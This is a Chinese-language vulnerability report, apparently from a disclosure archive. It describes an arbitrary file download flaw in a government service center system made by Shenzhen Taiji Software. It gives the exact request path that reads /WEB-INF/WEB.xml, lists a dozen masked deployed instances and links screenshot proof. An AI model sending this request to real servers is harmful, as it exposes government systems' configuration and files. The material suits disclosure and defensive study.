某政务服务中心系统通用型任意文件下载

### 简要描述： ### 详细说明： 深圳太极软件有限公司开发系统比较多；这款是政务服务中心系统；存在任意文件下载漏洞;这个系统的案例实在太多，都不需要我多说了~ 任意文件下载： ``` /servlet/fileOpenforms?filename=/WEB-INF/WEB.xml ``` Case: ``` http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml **.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml .....等等 ``` ### 漏洞证明： Security Testing: ``` 1、 ``` [<img src="https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png" alt="01.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png) ``` 2、有的也能直接读取 ``` [<img src="https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png" alt="02.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png) ``` ```